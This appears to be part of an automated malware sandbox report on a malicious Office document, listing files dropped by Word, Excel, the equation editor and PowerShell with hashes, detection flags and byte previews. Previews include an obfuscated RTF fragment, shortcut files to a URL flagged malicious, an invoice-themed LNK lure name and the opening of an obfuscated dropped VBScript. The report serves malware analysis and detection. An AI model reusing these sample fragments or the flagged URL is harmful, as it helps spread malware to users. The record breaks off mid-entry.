                                                                                                                                                                    Preview:{\rtf1..{\*\AqehQ4I8EUklcnb9szOy4fqMtZLWjKZg1RWAncfqXFTkF8ywlatgLcgpVV7T6Yslb2cBla3nOdWyP8aHEh4aJkDR06AnZidobfr1WVrlQgojFLpyvMqw8asx0NQnJLDaeN9zBuTWKRFHuH7mVb73wf3ACMmjSy3sQAOKvJIsjvkvaUqUdSoCuW9qE}..{\646097595(*;2%~=+?/#^%!|4:.;';?%2%./?]62`[;-?/~?.).+)@<.|]%/]?_.(+4?9%?||<;6778*.?(!45#<&]??/|./~.,=)-9?=#[71$;/!:);?|.7@%)-`'2#]|6+;:=.?.?1*_^=8.'=:/2?_>`!14).53?^^[=.?~3%~29,8,_>@5?8@=~:%@;93~1!.9[`*-.+?7.5$[?<#.12'8!%)12-*6?&.+[8'..^.`/`>[557!99?&.?[|3??=|4?6@;-6=,;@~7'/5>1.`=0=8,118`3??#:%.?|~9;.!#*?[&5+*4:#?%.).2/$9~0#_?`%]4:-9:2%-%1?.6)`&%8%~?[/&?4+/9?1!?5?1+_8&)%8;;?<,>/30=<$9@?.=8#.$&%=6*3?6.@,8/#8?>8'%&7![&5.4!8^[]49@^)3[7&.&*.9?.>9%0,..5?1%2<]?<?_@^,#6;5%1(<>?>(?>).&/,);?.&<#?=2<?+:@-.`((_#!@.+0!?~'|%47%?8;!19|/,@`5=]`@=+$21(%.~'/!5%+*?+$25~?$&(.(^$*4-%?#)%->-#:?9~>|*;=],^;%@?<#0.~&%??,#>.8(`4.'$%4$#+,?~.?7<;@4?`<[*3-`(2)?.]5$1??826361^).*.*29???[%-1-*9?82.+#31&@.%_?&2%;`.*95?|5.?2.+???^[[+47'54%.==+?:!>~<[.9#.0006/%.$1(@.?=~[0|;;@!?%+%.?79?>@47`5~'>`??.44.%?77.:'?1&.;7]|_!38=/
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2342852
                                                                                                                                                                    Entropy (8bit):2.6417290025884554
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:D8elSEv4mD3f5ReZdZJElOFmBwPuqOag8J0tuGOE68J0P:DJlSDmzCJEu5Lg00jh600P
                                                                                                                                                                    MD5:B2020C2F370E4625A9EA3C36EEA00DAF
                                                                                                                                                                    SHA1:3BCAF1F0CC2E64FDEC9FD0941BA7903A4772F093
                                                                                                                                                                    SHA-256:BF45DCFBDBC932E7AE776DA6BDCB2026E3C51924BFC017DB37482C68C8722C32
                                                                                                                                                                    SHA-512:78F17558C35106A343B868C35C9429380CA6F606ABCD7644CF866B67CCB157A57F050173B39C1D4B6C86A20039E4AC7F0B12CA564D754C9DC163C877583C7C08
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:....l...............2...........@m..?... EMF.....#.'...4...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                    Entropy (8bit):1.6968137655909024
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:tF9mMP4GZJ+/HFNH4DK5q+LefBWvMPPGD9J+RlH4DK5q+LefBW:rFPj04DK5q+2PPgKN4DK5q+2
                                                                                                                                                                    MD5:37A9D50723E3AECF4D3C65556CB7B094
                                                                                                                                                                    SHA1:0D94268FD8730DE8324C2AF68ED8FF35892547ED
                                                                                                                                                                    SHA-256:E1246A6C23C9F91B672BBB52E40D1B51E6086C642AA357BCB14DE79048504C08
                                                                                                                                                                    SHA-512:9D895F9E2A8E63C89D91B17595AC2F5BC480C28BC05922CC1545447D794E7EAA6178836D745F4B8D8B56009DCA3C47BD940C5149BA9F0C561695C3C598861777
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):9216
                                                                                                                                                                    Entropy (8bit):3.5847378008885338
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:OIDtMJxZjRw+fI15ZOceVAQh+G+p7f5f78d+b0I8YXC+958rY2X:zDyRHfIEceVAqHUf5ju+QIDC+9L2X
                                                                                                                                                                    MD5:84E8EA817F2C8410DFBC15A369AAE018
                                                                                                                                                                    SHA1:4192F4DBCC03A969E6636B02FF10A06F05EA277A
                                                                                                                                                                    SHA-256:951D9115ECADEAE3620BAE258578D489E6A1C70B2635C7C2CA5F47EC4588468B
                                                                                                                                                                    SHA-512:C450B1F46F41F8D585757BC8440782FA8EB8AC9BA6AD482CB985244DBD429C7A09DD11CFC276EC3D9EB8806B72D86013589C3625C446A01E829FF2D0ACED650D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:4.6.0.9.7.5.9.5.(.*.;.2.%.~.=.+.?./.#.^.%.!.|.4.:...;.'.;.?.%.2.%.../.?.].6.2.`.[.;.-.?./.~.?...)...+.).@.<...|.].%./.].?._...(.+.4.?.9.%.?.|.|.<.;.6.7.7.8.*...?.(.!.4.5.#.<.&.].?.?./.|.../.~...,.=.).-.9.?.=.#.[.7.1.$.;./.!.:.).;.?.|...7.@.%.).-.`.'.2.#.].|.6.+.;.:.=...?...?.1.*._.^.=.8...'.=.:./.2.?._.>.`.!.1.4.)...5.3.?.^.^.[.=...?.~.3.%.~.2.9.,.8.,._.>.@.5.?.8.@.=.~.:.%.@.;.9.3.~.1.!...9.[.`.*.-...+.?.7...5.$.[.?.<.#...1.2.'.8.!.%.).1.2.-.*.6.?.&...+.[.8.'.....^...`./.`.>.[.5.5.7.!.9.9.?.&...?.[.|.3.?.?.=.|.4.?.6.@.;.-.6.=.,.;.@.~.7.'./.5.>.1...`.=.0.=.8.,.1.1.8.`.3.?.?.#.:.%...?.|.~.9.;...!.#.*.?.[.&.5.+.*.4.:.#.?.%...)...2./.$.9.~.0.#._.?.`.%.].4.:.-.9.:.2.%.-.%.1.?...6.).`.&.%.8.%.~.?.[./.&.?.4.+./.9.?.1.!.?.5.?.1.+._.8.&.).%.8.;.;.?.<.,.>./.3.0.=.<.$.9.@.?...=.8.#...$.&.%.=.6.*.3.?.6...@.,.8./.#.8.?.>.8.'.%.&.7.!.[.&.5...4.!.8.^.[.].4.9.@.^.).3.[.7.&...&.*...9.?...>.9.%.0.,.....5.?.1.%.2.<.].?.<.?._.@.^.,.#.6.;.5.%.1.(.<.>.?.>.(.?.>.)...&./.,.).;.?...&.<.#.?.=.2.<.?.+.:.@.-...`.
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1024
                                                                                                                                                                    Entropy (8bit):0.05390218305374581
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x1dbe0204, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):21037056
                                                                                                                                                                    Entropy (8bit):1.1390573980214873
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:FO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:FOEXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                                                    MD5:45F97B0D36F7FE357CA8319DF1CAECE4
                                                                                                                                                                    SHA1:B30447229A7DD1A0E95F25ADB25361830141563E
                                                                                                                                                                    SHA-256:0A2D2DB2403D516CF494BB0A9904A8EF4C0541E8CA8EDC63299B5E389B18C7C3
                                                                                                                                                                    SHA-512:D2F7AC9CA96722661C6ACBE1C5B284BECABC59954E028F9A090DE576260BB5B3911E08C7F98D31253AF532CDBFB21B9F013DB9992353E95A77C21BAF69269EB3
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:....... ........................u..............................;:...{..*4...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:1
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:1
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:1
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Qn:Qn
                                                                                                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:1
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):131072
                                                                                                                                                                    Entropy (8bit):0.025553961890493235
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:I3DPcqUrMN1HvxggLRSDgMXb5FRXv//4tfnRujlw//+GtluJ/eRuj:I3DPFUovPCgMXRvYg3J/
                                                                                                                                                                    MD5:F7EB0A32486A6C386C0FA9A2758E6EAE
                                                                                                                                                                    SHA1:E15FA6BB24D439D2A1E5E07756E9F88B93E9BCAA
                                                                                                                                                                    SHA-256:251D9677D6148BBEA769E2A5AFE699C399571CFCE97D4E455C6FE69C5917ED1E
                                                                                                                                                                    SHA-512:1672C42110417FEC4B130B7FAA4FA66651C584D08DB9CB2E1451C66DBBD3B05FE5778D4348572F2977807C13837129B79403233F924C958B99753BCDBF44AB8E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:......M.eFy...z.SJ .~.D.....;]S,...X.F...Fa.q............................1K{../.D.... A}.........s..3..K..=.f|......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):131072
                                                                                                                                                                    Entropy (8bit):0.025506844008816903
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:I3DPcEDmhQvxggLR3GKbHRZ9rNM3RXv//4tfnRujlw//+GtluJ/eRuj:I3DP9Dmh2bTjRDrNavYg3J/
                                                                                                                                                                    MD5:0B9A7FF55133B88C37B8B7ACAC55BFEC
                                                                                                                                                                    SHA1:E8198259AE974B1065C2D94D88B8EE9426A15A14
                                                                                                                                                                    SHA-256:9FBC87913323F64184575DDF9679AF9842571345CC9A2EFF736D0D754288FA18
                                                                                                                                                                    SHA-512:90175CA52221E226AA53FF3301C753D0BA91E72438704136245D0BB41DC1D4361977A4AFD616E3E0099D7C21E3FF5876520B95CF8B62E0A4C195AD0047B8EDE8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:......M.eFy...z.....Q.F.....XI.S,...X.F...Fa.q................................w{.H..c.R..........^w.S.rO.N/.p(.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):512
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3::
                                                                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):512
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3::
                                                                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):16384
                                                                                                                                                                    Entropy (8bit):0.30902575462783355
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:Q1Yv6yHuKn/Ry/+5f86KIClYMGDNTUKmFwI1CBKJ1lFi8wc8TbLSlsxhvcUBfRzQ:FS9BxJIxN4KmFwD8wRWsxtRfR
                                                                                                                                                                    MD5:547CFE6B6224268AFF7EF7E3E81A2405
                                                                                                                                                                    SHA1:59747BEE949F321343D5F9F447E4511E9E959965
                                                                                                                                                                    SHA-256:068297AC733ECE88614308F3A1FD49D4E2F941661BF37BA3EC45E74FD700208A
                                                                                                                                                                    SHA-512:DF1D6E1030182BE59E79B96A3E4789F3FD0BE1451774A678FDE035A15D730C6A4E45F501BCA423F51984CD6ED4DA6309923F2DF2027E4D98D750E116242E7059
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                    File Type:MS Windows 95 Internet shortcut text (URL=<https://m2g.me/d1a1>), ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):45
                                                                                                                                                                    Entropy (8bit):4.624751985026256
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:HRAbABGQYm2fTexv:HRYFVm4Te
                                                                                                                                                                    MD5:1DBAFA7387B83F02D775C6E2CECDE3A3
                                                                                                                                                                    SHA1:E51FC36ACFAC9E366184160E1A441F6ED7C7DA74
                                                                                                                                                                    SHA-256:DF409235078F0508BCA4087434C46F93ADF8138C019D0B72E73F12EC0D5DF8B2
                                                                                                                                                                    SHA-512:DF6E9D3E949F58434231AF49916A16790C5C542BD171B502674D8AB037B8A73C474A615EC1E92236DC2494C9C8C244708A5523600B307BAAD5D46ED467FFD2D5
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview:[InternetShortcut]..URL=https://m2g.me/d1a1..
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                    File Type:Generic INItialization configuration [xls]
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                    Entropy (8bit):4.773486086243754
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:bDqEjXSuiFpLFuYVomMPZpLFuYVov:bmErSuiFpLFuYV6PZpLFuYVy
                                                                                                                                                                    MD5:49DFAE1EFC3204C15AD158559DECCEFC
                                                                                                                                                                    SHA1:A221E133CB99ACF1FE027ED27C3C359CD201CD3D
                                                                                                                                                                    SHA-256:A0D70404F57F6FF5881943AA5EC3834AF78405DB5662B808A201B0195C2002EC
                                                                                                                                                                    SHA-512:FD594FBA9840C580A74DE3D1764137CAA44B52329E9B8436446D56AF69E99F129ABC6E08B85C866102F819673031483EB9CE0B8E05C470EA86446CDCC356E52F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:[folders]..d1a1.url=0..m2g.me.url=0..invoice_45009.LNK=0..[xls]..invoice_45009.LNK=0..
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                    File Type:MS Windows 95 Internet shortcut text (URL=<https://m2g.me/>), ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                    Entropy (8bit):4.4546361507484775
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:HRAbABGQYm2fTl:HRYFVm4Tl
                                                                                                                                                                    MD5:843DD0754B021F8B22D00099373E9CBA
                                                                                                                                                                    SHA1:85D399E0A3770EFF869F18484F6BFCDCBDDEF492
                                                                                                                                                                    SHA-256:62BFA602E851680D75C31E964FBF84293A356FADAAB6C5522E1C0F90192F46A1
                                                                                                                                                                    SHA-512:0F8E24FDBFD7FE71CE7FD0A4E837C0ED179914C79914DFF458001EAFA432DF076AA2D68A7A04CFCC3F0AED23AE3E2BA60FE3C195B746D92F18533A83A1676D47
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview:[InternetShortcut]..URL=https://m2g.me/..
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):162
                                                                                                                                                                    Entropy (8bit):2.503835550707525
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:vrJlaCkWtVyZbHigAWvCGkJU2lln:vdsCkWtyjigDzXKl
                                                                                                                                                                    MD5:149A07C771DCBEC7963281041D02A4E6
                                                                                                                                                                    SHA1:A0E70DB2FF3DE3B764B29DE2E34241B423F3A473
                                                                                                                                                                    SHA-256:3A3A1498C9FD6DA3DCDA7F682BE2E38B72D21F5FBC492AADE492FACCCAA8D387
                                                                                                                                                                    SHA-512:2784EC471F04A9625097B967B2FDB42E5FE28F459B7EB6D1F36B656C2B7C26EF32DE50D852CE02198CA88739548C50AD8A471AAF0C856092A878D50931640E3C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):194434
                                                                                                                                                                    Entropy (8bit):3.7261905667604673
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:azeQUsdSmY4+DxihGtPgt5pRGwTFiLk0KCwOh/w5YWpUZ:at+VxT60Tq5YWpA
                                                                                                                                                                    MD5:C3B10EFAA54F302A05428F1CC7C58EC4
                                                                                                                                                                    SHA1:A773D0FB6A8F58292954658753D0175538DB5CE5
                                                                                                                                                                    SHA-256:919C5984C4BABC8F1FD94161EE2B6D15149F1C91B0043912E99EF033F8AAC8B9
                                                                                                                                                                    SHA-512:DA97ADF8F68B6737183EB2E85F235FAACBA093589BB93C7CBEA4AF3B0FFEC8BA2133C0228F18BD61B9374FC8DD6B04BF99CEA2F309837CF8E85C4273813C50F6
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .r.o.x.e.a.r.(.c.a.n.d.e.l.a.,. .e.s.t.r.o.p.e.a.m.e.n.t.o.,. .h.y.p.o.p.l.a.s.i.a.,. .e.s.t.a.l.a.j.a.d.e.i.r.a.,. .a.d.a.g.i.e.i.r.o.)..... . . . .d.i.m. .f.i.l.t.e.r..... . . . .d.i.m. .d.i.a.l.e.c.t..... . . . .d.i.m. .e..... . . . .d.i.m. .r.e.s..... . . . .d.i.m. .f.o.r.m.a.t.t.e.d.T.e.x.t..... . . . .d.i.m. .f.l.a.g.s..... . . . ..... . . . .f.l.a.g.s. .=. .0..... . . . . ..... . . . .i.f. .h.y.p.o.p.l.a.s.i.a...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.F.I.L.T.E.R.). .t.h.e.n..... . . . . . . . .f.i.l.t.e.r. .=. .h.y.p.o.p.l.a.s.i.a...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.F.I.L.T.E.R.)..... . . . . . . . .d.i.a.l.e.c.t. .=. .U.R.I._.W.Q.L._.D.I.A.L.E.C.T..... . . . .e.n.d. .i.f..... . . . ..... . . . .i.f. .h.y.p.o.p.l.a.s.i.a...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.D.I.A.L.E.C.T.). .t.h.e.n..... . . . . . . . .d.i.a.l.e.c.t. .=. .h.y.p.o.p.l.a.s.i.a...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.D.I.A.L.E.C.T.)..... . . . .e.n.d. .i.f..... . . . ..... . . . .I.
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 7 13:53:24 2024, Security: 1
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1101824
                                                                                                                                                                    Entropy (8bit):7.30061517227484
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:xmzHJEHAfwu4hDD3DERnLRmF8DN9rf1o3duFu6YraHS+SkWYmS1N7zJT+TBsFYQf:gLw/hDbARM8b63HrSoSz7laBoPA8K
                                                                                                                                                                    MD5:0C48E70860822B6B12E38A7E866049C8
                                                                                                                                                                    SHA1:BE871C8C76FBD986AE6ACA8DAB2D805D14248C48
                                                                                                                                                                    SHA-256:497F55226524722C46747752F938746AFEE6ED4FF6B680988FB4D4DEAACC3CE7
                                                                                                                                                                    SHA-512:B014C3E3EA0ECAB69D2766891ED320C1EE4B71F9A291C1FFDD4C012B8464C50460A5CD3C89689AF0FC819EC162EA26024A65EE09668B3A575BD3EBB40AC6BE12
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:......................>...............................................................................;.......................h.......j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):26
                                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
